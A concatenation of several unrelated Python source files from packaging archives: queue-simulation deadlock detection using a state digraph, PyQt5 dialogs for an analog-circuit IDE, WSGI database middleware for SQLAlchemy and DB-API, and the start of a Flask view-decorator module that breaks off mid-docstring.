Using this class is equivalent to having no deadlock detection
capabilities.
"""
def __init__(self):
"""
Initialises the detection mechanism class.
"""
pass
def initialise_at_node(self, node):
"""
Initialises the detection mechanism when the node is created.
"""
pass
def detect_deadlock(self):
"""
Returns True is deadlock is reached, False otherwise.
"""
return False
def action_at_attach_server(self, node, server, individual):
"""
The action taken at the 'attach_server' method of the node.
"""
pass
def action_at_blockage(self, individual, next_node):
"""
        The action taken at the 'block_individual' method of the node.
"""
pass
def action_at_detatch_server(self, server):
"""
The action taken at the 'detatch_server' method of the node.
"""
pass
class StateDigraph(NoDetection):
"""
The state digraph method keeps track of a directed graph of the
simulation state, where:
- Vertices represent Servers
- Edges represent blockage relationships, such that there
is a directed edge from vertices j -> k iff the customer
at server j is blocked from entering the node that
contains k.
Deadlock is equivalent to a knot in the directed graph.
"""
def __init__(self):
"""
Initialises the state digraph detection mechanism class.
"""
self.statedigraph = nx.DiGraph()
def initialise_at_node(self, node):
"""
Initialises the state digraph when the node is created.
Adds the servers of that node if c < Inf.
"""
if node.c < float("Inf"):
self.statedigraph.add_nodes_from([str(s) for s in node.servers])
def detect_deadlock(self):
"""
Detects whether the system is in a deadlocked state,
that is, is there a knot. Note that this code is taken
and adapted from the NetworkX Developer Zone Ticket
#663 knot.py (09/06/2015).
"""
knots = []
for c in nx.strongly_connected_components(self.statedigraph):
subgraph = self.statedigraph.subgraph(c)
nodes = set(subgraph.nodes())
if len(nodes) == 1:
n = nodes.pop()
nodes.add(n)
if set(self.statedigraph.successors(n)) == nodes:
knots.append(subgraph)
else:
for n in nodes:
successors = nx.descendants(self.statedigraph, n)
if successors <= nodes:
knots.append(subgraph)
break
if len(knots) > 0:
return True
return False
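    # Illustrative sketch (an assumed example, not part of Ciw's API): the
    # smallest knot is two servers blocking each other, which this method
    # reports as deadlock:
    #
    #     d = StateDigraph()
    #     d.statedigraph.add_edge('Server 1', 'Server 2')
    #     d.statedigraph.add_edge('Server 2', 'Server 1')
    #     d.detect_deadlock()  # -> True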
def action_at_attach_server(self, node, server, individual):
"""
The action taken at the 'attach_server' method of the node:
        - If a new customer joins a server, and their server is still
          blocking a customer, then that edge needs to remain.
However it was removed at the action_at_detatch_server, so
it needs to be added back in.
"""
for blq in node.blocked_queue:
inds = [
ind for ind in node.simulation.nodes[blq[0]].all_individuals
if ind.id_number == blq[1]
]
ind = inds[0]
if ind != individual:
self.statedigraph.add_edge(str(ind.server), str(server))
def action_at_blockage(self, individual, next_node):
"""
        The action taken at the 'block_individual' method of the node:
- Add edges between blocked server and servers of the next node.
"""
for svr in next_node.servers:
self.statedigraph.add_edge(str(individual.server), str(svr))
def action_at_detatch_server(self, server):
"""
The action taken at the 'detatch_server' method of the node:
- Remove any edges of servers who have been detatched.
"""
self.statedigraph.remove_edges_from(
list(self.statedigraph.in_edges(str(server)))
+ list(self.statedigraph.out_edges(str(server)))
) | PypiClean |
/IDEPyAMS-0.0.4.3.tar.gz/IDEPyAMS-0.0.4.3/src/dialogs.py |
from PyQt5 import QtCore, QtGui, QtWidgets
from collections import deque
import os
import data_rc
#-------------------------------------------------------------------------------
# class Ui_DialogImportPart: interface of the dialog for importing symbols.
#-------------------------------------------------------------------------------
class Ui_DialogImportPart(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(396, 389)
self.gridLayout = QtWidgets.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.treeView = QtWidgets.QTreeView(Dialog)
self.treeView.setObjectName("treeView")
self.verticalLayout.addWidget(self.treeView)
self.horizontalLayout.addLayout(self.verticalLayout)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.verticalLayout_2.addWidget(self.label_2)
self.listView = QtWidgets.QListView(Dialog)
self.listView.setObjectName("listView")
self.verticalLayout_2.addWidget(self.listView)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "Directory"))
self.label_2.setText(_translate("Dialog", "Symbols"))
#-------------------------------------------------------------------------------
# class dialogImportPart: dialog for importing symbols.
#-------------------------------------------------------------------------------
class dialogImportPart:
def __init__(self):
self.w = QtWidgets.QDialog()
self.pathLib='';
self.ui = Ui_DialogImportPart()
self.ui.setupUi(self.w)
self.dirModel = QtWidgets.QFileSystemModel()
self.dirModel.setRootPath(QtCore.QDir.rootPath())
self.dirModel.setFilter(QtCore.QDir.NoDotAndDotDot | QtCore.QDir.AllDirs)
self.fileModel = QtWidgets.QFileSystemModel()
self.fileModel.setNameFilters(["*.sym"])
self.fileModel.setNameFilterDisables(False)
self.ui.treeView.setModel(self.dirModel)
self.ui.listView.setModel(self.fileModel)
self.ui.treeView.clicked.connect(self.treeClicked)
self.ui.listView.clicked.connect(self.listClicked)
self.ui.treeView.hideColumn(1)
self.ui.treeView.hideColumn(2)
self.ui.treeView.hideColumn(3)
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def setPath(self,path):
self.ui.treeView.setRootIndex(self.dirModel.index(path))
self.ui.listView.setRootIndex(self.fileModel.index(path))
def treeClicked(self, index):
path = self.dirModel.fileInfo(index).absoluteFilePath()
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
self.ui.listView.setRootIndex(self.fileModel.setRootPath(path))
def listClicked(self, index):
path = self.fileModel.fileInfo(index).absoluteFilePath()
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
if path!='':
root, ext = os.path.splitext(path)
if(ext=='.sym'):
self.file=path;
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True);
def show(self):
self.w.show()
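# Usage sketch (assumed from the methods above; 'symbols/' is a hypothetical
# directory): point the dialog at a symbol library, run it modally, then read
# back the chosen *.sym file:
#
#     dlg = dialogImportPart()
#     dlg.setPath('symbols/')
#     if dlg.w.exec_() == QtWidgets.QDialog.Accepted:
#         print(dlg.file)  # absolute path of the selected symbol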
#-------------------------------------------------------------------------------
# class ui_optionSimulation: interface of the simulator options dialog.
#-------------------------------------------------------------------------------
class ui_optionSimulation(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(387, 322)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/image/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
Dialog.setSizeGripEnabled(False)
self.gridLayout_2 = QtWidgets.QGridLayout(Dialog)
self.gridLayout_2.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
self.gridLayout_2.setObjectName("gridLayout_2")
self.groupBox_2 = QtWidgets.QGroupBox(Dialog)
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_5 = QtWidgets.QLabel(self.groupBox_2)
self.label_5.setObjectName("label_5")
self.horizontalLayout_5.addWidget(self.label_5)
self.spinBoxInterval = QtWidgets.QSpinBox(self.groupBox_2)
self.spinBoxInterval.setMinimum(100)
self.spinBoxInterval.setMaximum(1100)
self.spinBoxInterval.setProperty("value", 100)
self.spinBoxInterval.setObjectName("spinBoxInterval")
self.horizontalLayout_5.addWidget(self.spinBoxInterval)
self.verticalLayout.addLayout(self.horizontalLayout_5)
self.gridLayout_2.addWidget(self.groupBox_2, 1, 0, 1, 1)
self.groupBox = QtWidgets.QGroupBox(Dialog)
self.groupBox.setObjectName("groupBox")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_3.setObjectName("gridLayout_3")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(self.groupBox)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.lineEditAbstol = QtWidgets.QLineEdit(self.groupBox)
self.lineEditAbstol.setObjectName("lineEditAbstol")
self.horizontalLayout.addWidget(self.lineEditAbstol)
self.gridLayout.addLayout(self.horizontalLayout, 0, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_2 = QtWidgets.QLabel(self.groupBox)
self.label_2.setObjectName("label_2")
self.horizontalLayout_2.addWidget(self.label_2)
self.lineEditVnton = QtWidgets.QLineEdit(self.groupBox)
self.lineEditVnton.setObjectName("lineEditVnton")
self.horizontalLayout_2.addWidget(self.lineEditVnton)
self.gridLayout.addLayout(self.horizontalLayout_2, 1, 0, 1, 1)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.label_3 = QtWidgets.QLabel(self.groupBox)
self.label_3.setObjectName("label_3")
self.horizontalLayout_3.addWidget(self.label_3)
self.lineEditReltol = QtWidgets.QLineEdit(self.groupBox)
self.lineEditReltol.setObjectName("lineEditReltol")
self.horizontalLayout_3.addWidget(self.lineEditReltol)
self.gridLayout.addLayout(self.horizontalLayout_3, 2, 0, 1, 1)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_4 = QtWidgets.QLabel(self.groupBox)
self.label_4.setObjectName("label_4")
self.horizontalLayout_4.addWidget(self.label_4)
self.spinBoxITL1 = QtWidgets.QSpinBox(self.groupBox)
self.spinBoxITL1.setMinimum(50)
self.spinBoxITL1.setMaximum(1000)
self.spinBoxITL1.setProperty("value", 100)
self.spinBoxITL1.setObjectName("spinBoxITL1")
self.horizontalLayout_4.addWidget(self.spinBoxITL1)
self.gridLayout.addLayout(self.horizontalLayout_4, 3, 0, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout, 0, 0, 1, 1)
self.gridLayout_2.addWidget(self.groupBox, 0, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.pushButtonReset = QtWidgets.QPushButton(Dialog)
self.pushButtonReset.setObjectName("pushButtonReset")
self.horizontalLayout_6.addWidget(self.pushButtonReset)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.horizontalLayout_6.addWidget(self.buttonBox)
self.gridLayout_2.addLayout(self.horizontalLayout_6, 5, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept) # type: ignore
self.buttonBox.rejected.connect(Dialog.reject) # type: ignore
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Simulator Options"))
self.groupBox_2.setTitle(_translate("Dialog", "Interactive simulation"))
self.label_5.setText(_translate("Dialog", "Interval of simulation in milliseconds "))
self.groupBox.setTitle(_translate("Dialog", "Converge"))
self.label.setText(_translate("Dialog", "Absolute flow tolerance (ABSTol) "))
self.lineEditAbstol.setText(_translate("Dialog", "1e-8"))
self.label_2.setText(_translate("Dialog", "Absolute potential tolerance (Vntol) "))
self.lineEditVnton.setText(_translate("Dialog", "1e-6"))
self.label_3.setText(_translate("Dialog", "Relative flow and potential tolerances (Realtol)"))
self.lineEditReltol.setText(_translate("Dialog", "1e-3"))
self.label_4.setText(_translate("Dialog", "Maximum number of iterations (ITL1) "))
self.pushButtonReset.setText(_translate("Dialog", "Reset to Default"))
#-------------------------------------------------------------------------------
# class optionSimulation: simulator options dialog.
#-------------------------------------------------------------------------------
class optionSimulation:
def __init__(self,result):
self.w = QtWidgets.QDialog()
self.r=result[0]
self.reset=False;
self.path='';
self.pathLib='';
self.ui = ui_optionSimulation()
self.ui.setupUi(self.w)
self.ui.spinBoxITL1.setValue(self.r['itl1']);
self.ui.spinBoxInterval.setValue(self.r['interval']);
self.ui.lineEditAbstol.setText(str(self.r['abstol']));
self.ui.lineEditReltol.setText(str(self.r['reltol']));
self.ui.lineEditVnton.setText(str(self.r['vntol']));
self.ui.buttonBox.accepted.connect(self.accept);
self.ui.pushButtonReset.clicked.connect(self.updateOption);
def accept(self):
try:
self.r['itl1']=self.ui.spinBoxITL1.value();
self.r['interval']=self.ui.spinBoxInterval.value();
self.r['abstol']=float(self.ui.lineEditAbstol.text());
self.r['reltol']=float(self.ui.lineEditReltol.text());
self.r['vntol']=float(self.ui.lineEditVnton.text());
except Exception as e: # work on python 3.x
str_error='Error: '+ str(e);
QtWidgets.QMessageBox.about(None, 'Error',str_error)
def updateOption(self):
self.reset=True;
self.w.close();
def show(self):
self.w.show()
#-------------------------------------------------------------------------------
# class Ui_about: interface of the about dialog.
#-------------------------------------------------------------------------------
class Ui_about(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.setEnabled(True)
Dialog.resize(499, 241)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/image/logo.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
Dialog.setSizeGripEnabled(False)
Dialog.setModal(False)
self.gridLayout = QtWidgets.QGridLayout(Dialog)
self.gridLayout.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
self.gridLayout.setObjectName("gridLayout")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(Dialog)
self.label.setStyleSheet("")
self.label.setFrameShadow(QtWidgets.QFrame.Sunken)
self.label.setText("")
self.label.setTextFormat(QtCore.Qt.MarkdownText)
self.label.setPixmap(QtGui.QPixmap(":/image/logo.png"))
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.label_2 = QtWidgets.QLabel(Dialog)
self.label_2.setToolTip("")
self.label_2.setToolTipDuration(-1)
self.label_2.setAutoFillBackground(False)
self.label_2.setStyleSheet("")
self.label_2.setObjectName("label_2")
self.horizontalLayout.addWidget(self.label_2)
self.verticalLayout.addLayout(self.horizontalLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label_2.setText(_translate("Dialog", '''
<html><head/><body><p align="center"><br/><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">PyAMS Pre-alpha 0.0.4</span></p><p align="center"><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">Python for Analog and Mixed Signals</span></p><p align="center"><a href="http://www.pyams.org"><span style=" font-size:12pt; text-decoration: underline; color:#0000ff;">www.pyams.org</span></a></p><p align="center"><span style=" font-family:'monospace'; font-size:10pt; font-weight:600; color:#000000;">(c) 2021-2022</span></p><p align="center"><span style=" font-size:10pt;"><br/></span></p></body></html>
'''));
#-------------------------------------------------------------------------------
# class about: about dialog.
#-------------------------------------------------------------------------------
class about:
def __init__(self):
self.w = QtWidgets.QDialog()
self.path='';
self.pathLib='';
self.ui = Ui_about()
self.ui.setupUi(self.w)
def show(self):
self.w.show()
#-------------------------------------------------------------------------------
# class Ui_DialogListSignalsParamaters: interface of the List of Signals
# & Parameters dialog.
#-------------------------------------------------------------------------------
class Ui_DialogListSignalsParamaters(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(449, 510)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.treeView = QtWidgets.QTreeView(Dialog)
self.treeView.setObjectName("treeView")
self.verticalLayout.addWidget(self.treeView)
self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.verticalLayout_2.addLayout(self.verticalLayout)
self.retranslateUi(Dialog)
self.buttonBox.accepted.connect(Dialog.accept)
self.buttonBox.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
def getImage(value):
if value['type']=='paramater':
return ":image/paramsignals/param.png"
elif (value['type']=='signal')and (value['description']=='voltage')and (value['dir']=='out'):
return ":image/paramsignals/vout.png"
elif (value['type']=='signal')and (value['description']=='voltage')and (value['dir']=='in'):
return ":image/paramsignals/vin.png"
elif (value['type']=='signal')and (value['dir']=='out'):
return ":image/paramsignals/iout.png"
elif (value['type']=='signal')and (value['dir']=='in'):
return ":image/paramsignals/iin.png"
elif (value['type']=='wire'):
return ":image/paramsignals/node.png"
#-------------------------------------------------------------------------------
# class dialogListSignalsParamaters: dialog for the List of Signals
# & Parameters.
#-------------------------------------------------------------------------------
class dialogListSignalsParamaters:
def __init__(self,data):
self.w = QtWidgets.QDialog()
self.path='';
self.pathLib='';
self.ui = Ui_DialogListSignalsParamaters()
self.ui.setupUi(self.w)
self.model = QtGui.QStandardItemModel()
self.model.setHorizontalHeaderLabels(['Name'])#, 'Type', 'Description'
# self.model.resizeSection(0, 42);
self.ui.treeView.setModel(self.model)
self.ui.treeView.header().resizeSection(0, 150);#setStyleSheet("QTreeView::item { width: 100px }")
self.ui.treeView.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.ui.treeView.clicked.connect(self.treeClicked)
self.importData(data)
self.ui.treeView.expandAll()
self.pos='None'
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def treeClicked(self, index):
row=index.row()
column=index.column()
data=index.data()
if len(data.split('.'))>1:
self.pos=data
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True);
else:
self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False);
def importData(self, data, root=None):
self.model.setRowCount(0)
if root is None:
root = self.model.invisibleRootItem()
seen = {} # List of QStandardItem
values = deque(data)
while values:
value = values.popleft()
if value['unique_id'] == 1:
parent = root
else:
pid = value['parent_id']
if pid not in seen:
values.append(value)
continue
parent = seen[pid]
unique_id = value['unique_id']
parent.appendRow([
QtGui.QStandardItem(QtGui.QIcon(getImage(value)),value['short_name'])
# QStandardItem(value['type']),
# QStandardItem(value['description'])
])
seen[unique_id] = parent.child(parent.rowCount() - 1)
#seen[unique_id].QStandardItem(QIcon("4.bmp"))
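    # Expected input shape (inferred from the lookups above): a flat list of
    # row dicts, each carrying at least 'unique_id', 'parent_id' (1 marks the
    # root) and 'short_name', plus the 'type'/'description'/'dir' keys read by
    # getImage(). Rows may arrive in any order: a child whose parent has not
    # been seen yet is pushed back onto the deque and retried.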
def show(self):
self.w.show()
from PyQt5.QtCore import QUrl
from PyQt5.QtWidgets import QMainWindow, QApplication
from PyQt5.QtWebEngineWidgets import QWebEngineView
#-------------------------------------------------------------------------------
# Open web page
#-------------------------------------------------------------------------------
class openWebPage(QMainWindow):
def __init__(self, *args, **kwargs):
super(openWebPage, self).__init__(*args, **kwargs)
self.browser = QWebEngineView()
def exec(self,var):
self.browser.setUrl(QUrl(var))
self.setCentralWidget(self.browser)
self.show()
class openWebPageDialog:
def __init__(self,url):
self.w = QtWidgets.QDialog()
self.w.resize(611, 647)
self.browser = QWebEngineView(self.w)
self.browser.setUrl(QUrl(url))
self.layout = QtWidgets.QVBoxLayout()
self.layout.addWidget(self.browser)
#self.layout.addWidget(self.buttonBox)
self.w.setLayout(self.layout)
#-------------------------------------------------------------------------------
# __main__: test Dialog
#-------------------------------------------------------------------------------
if __name__ == "__main__":
import sys
app = QApplication(sys.argv)
window = openWebPage()
var="https://pyams.org";
window.exec(var)
app.exec_() | PypiClean |
/CleverHarold-0.1.tar.gz/CleverHarold-0.1/harold/database/middleware.py |
# Copyright 2006 The Incorporated Wizzo Widget Works
# Distributed under the terms of the GNU General Public License v2
# Author: Troy Melhase <[email protected]>
from harold.lib import keys, import_wrapper
from harold.log import logger
try:
import sqlalchemy.mods.threadlocal
import sqlalchemy
import sqlalchemy.ext.activemapper as activemapper
import sqlalchemy.ext.sessioncontext as sessioncontext
except (ImportError, ):
sqlalchemy = None
try:
import sqlobject
except (ImportError, ):
sqlobject = None
class DataProvider(object):
""" Base class for database middleware
Subclasses must implement:
- connect(environ)
- disconnect(environ, exception=None)
@param app contained WSGI application
@param dsn data source name
@param models sequence of model modules
@param dbapi optional module object or string
@param debug flag for debug settings
"""
def __init__(self, app, dsn, models, module=None, debug=True):
self.app = app
self.dsn = dsn
self.models = models
if isinstance(module, basestring):
module = import_wrapper(module)
self.module = module
self.debug = debug
self.log = logger(self)
def __call__(self, environ, start_response):
try:
self.connect(environ)
self.log.debug('connected')
except (Exception, ), ex:
self.log.error('exception connecting', exc_info=ex)
raise
try:
results = self.app(environ, start_response)
except (Exception, ), ex:
self.log.error('application exception', exc_info=ex)
try:
self.disconnect(environ, ex)
except (Exception, ), exc:
self.log.error('exception disconnecting', exc_info=exc)
raise
try:
self.disconnect(environ)
self.log.debug('disconnected')
except (Exception, ), exc:
self.log.error('exception disconnecting', exc_info=exc)
return results
def connect(self, environ):
raise NotImplementedError
def disconnect(self, environ, exception=None):
raise NotImplementedError
def __str__(self):
return '<%s @ %s>' % (self.__class__.__name__, self.dsn, )
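# Sketch of the subclass contract (illustrative only; NullProvider is a
# hypothetical name): a concrete provider just implements connect() and
# disconnect() around the wrapped WSGI call:
#
#     class NullProvider(DataProvider):
#         def connect(self, environ):
#             environ[keys.data_connection] = None
#         def disconnect(self, environ, exception=None):
#             pass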
class SQLAlchemyProvider(DataProvider):
""" SQLAlchemy data provider
This type assumes that SQLAlchemy has been imported and an metadata
instance of some kind has been made ready for connection.
"""
def __init__(self, *args, **kwds):
if sqlalchemy is None:
raise RuntimeError('SQLAlchemy referenced but not installed')
super(SQLAlchemyProvider, self).__init__(*args, **kwds)
self.engine = sqlalchemy.create_engine(self.dsn)
for model in self.models:
try:
md = getattr(model, '__metadata__', getattr(model, 'metadata'))
except (AttributeError, ):
pass
else:
md.connect(self.engine)
def connect(self, environ):
""" connects to database and stores connection in environment
This method currently sucks because (1) we're not connecting
the tables because that doesn't work, and (2) we're not
        establishing any session or transaction for the request.
@param environ WSGI request environment
@return None
"""
session = environ[keys.data_session] = \
sqlalchemy.create_session(self.engine)
for model in self.models:
try:
os = model.objectstore
except (AttributeError, ):
pass
else:
os.context.current = session
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
session = environ[keys.data_session]
if exception:
session.close()
return
try:
session.flush()
except (Exception, ), ex:
self.log.error('exception during session flush', exc_info=ex)
try:
session.clear()
except (Exception, ), ex:
msg = 'second exception during session clear'
self.log.error(msg, exc_info=ex)
else:
self.log.error('session cleared after exception')
try:
session.close()
except (Exception, ), ex:
self.log.error('exception during session close', exc_info=ex)
else:
self.log.info('session closed')
class ActiveMapperProvider(SQLAlchemyProvider):
""" ActiveMapper data provider
"""
def __init__(self, *args, **kwds):
if sqlalchemy is None:
raise RuntimeError('ActiveMapper referenced but SQLAlchemy not installed')
super(ActiveMapperProvider, self).__init__(*args, **kwds)
self.engine = sqlalchemy.create_engine(self.dsn)
def connect(self, environ):
""" connects to database and stores connection in environment
"""
activemapper.objectstore.context.current = \
environ[keys.data_session] = \
sqlalchemy.create_session(self.engine)
class SQLObjectProvider(DataProvider):
""" not implemented
"""
def __init__(self, *args, **kwds):
if sqlobject is None:
raise RuntimeError('SQLObject referenced but not installed')
super(SQLObjectProvider, self).__init__(*args, **kwds)
#self.conn = sqlobject.dbconnection.ConnectionHub()
def connect(self, environ):
""" connects to database and stores connection in environment
"""
if self.debug:
print '%s opening %s' % (self, environ['PATH_INFO'], )
environ[keys.data_connection] = \
sqlobject.sqlhub.processConnection = \
sqlobject.connectionForURI(self.dsn)
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
class DBAPIProvider(DataProvider):
"""
"""
def connect(self, environ):
""" connects to database and stores connection in environment
@param environ WSGI request environment
@return None
"""
dsn = self.dsn
if isinstance(dsn, dict):
con = self.module.connect(**dsn)
else:
con = self.module.connect(dsn)
environ[keys.data_connection] = con
def disconnect(self, environ, exception=None):
""" commits pending changes and closes connection
@param environ WSGI request environment
@return None
"""
con = environ[keys.data_connection]
if exception:
con.rollback()
else:
con.commit()
con.close()
def __str__(self):
args = (self.__class__.__name__, self.module.__name__,
self.dsn, abs(id(self)))
return '<%s (%s @ %s) at 0x%x>' % args | PypiClean |
/Harambe-0.10.0.tar.gz/Harambe-0.10.0/harambe/decorators.py | import functools
import inspect
import copy
from flask import Response, jsonify, request, current_app, url_for, make_response, g
from werkzeug.wrappers import BaseResponse
from jinja2 import Markup
from dicttoxml import dicttoxml
from .core import (Harambe,
init_app,
apply_function_to_members,
build_endpoint_route_name)
from . import ext
from . import utils
import blinker
import flask_cors
import json
import sys
# ------------------------------------------------------------------------------
# Some aliases, to keep decorators together
cache = ext.cache.cached
memoize = ext.cache.memoize
exempt_csrf = ext.csrf.exempt
# ------------------------------------------------------------------------------
def route(rule=None, **kwargs):
"""
    This decorator defines a custom route for both classes and methods in the view.
It behaves the same way as Flask's @app.route
on class:
It takes the following args
- rule: the root route of the endpoint
- decorators: a list of decorators to run on each method
on methods:
along with the rule, it takes kwargs
- endpoint
- defaults
- ...
:param rule:
:param kwargs:
:return:
"""
_restricted_keys = ["route", "decorators"]
def decorator(f):
if inspect.isclass(f):
kwargs.setdefault("route", rule)
kwargs["decorators"] = kwargs.get("decorators", []) + f.decorators
setattr(f, "_route_extends__", kwargs)
setattr(f, "base_route", kwargs.get("route"))
setattr(f, "decorators", kwargs.get("decorators", []))
else:
if not rule:
raise ValueError("'rule' is missing in @route ")
for k in _restricted_keys:
if k in kwargs:
del kwargs[k]
Harambe._bind_route_rule_cache(f, rule=rule, **kwargs)
return f
return decorator
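# Usage sketch (assumed from the docstring above; AdminView and the paths are
# hypothetical names): @route composes a class-level prefix with per-method
# rules:
#
#     @route("/admin", decorators=[])
#     class AdminView(Harambe):
#         @route("/dashboard", endpoint="admin_dashboard")
#         def index(self):
#             return {}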
def _accept_method(methods, f):
kw = {
"append_method": True,
"methods": methods
}
Harambe._bind_route_rule_cache(f, rule=None, **kw)
return f
def accept_get(f):
""" Accept GET method """
return _accept_method(["GET"], f)
def accept_post(f):
""" Accept POST method """
return _accept_method(["POST"], f)
def accept_post_get(f):
""" Accept POST & GET method """
return _accept_method(["POST", "GET"], f)
def accept_delete(f):
""" Accept DELETE method """
return _accept_method(["DELETE"], f)
def accept_options(f):
""" Accept OPTIONS method """
return _accept_method(["OPTIONS"], f)
def accept_put(f):
""" Accept PUT method """
return _accept_method(["PUT"], f)
def template(page=None, layout=None, markup="jade", **kwargs):
"""
Decorator to change the view template and layout.
    It works on both the Harambe class and view methods
    on class
        only $layout and markup are applied, everything else will be passed to the kwargs
        Used as the first argument, it will be the layout.
        :first arg or $layout: The layout to use for that view
        :param layout: The layout to use for that view
        :param markup: the markup to use; 'jade' by default (matching the
            signature), with 'html' as the fallback when unset. This is
            attached to the view as template_markup
        :param kwargs:
            get passed to the TEMPLATE_CONTEXT
    ** on methods that return a dict
        page or layout are optional
        :param page: The html page
        :param layout: The layout to use for that view
        :param kwargs:
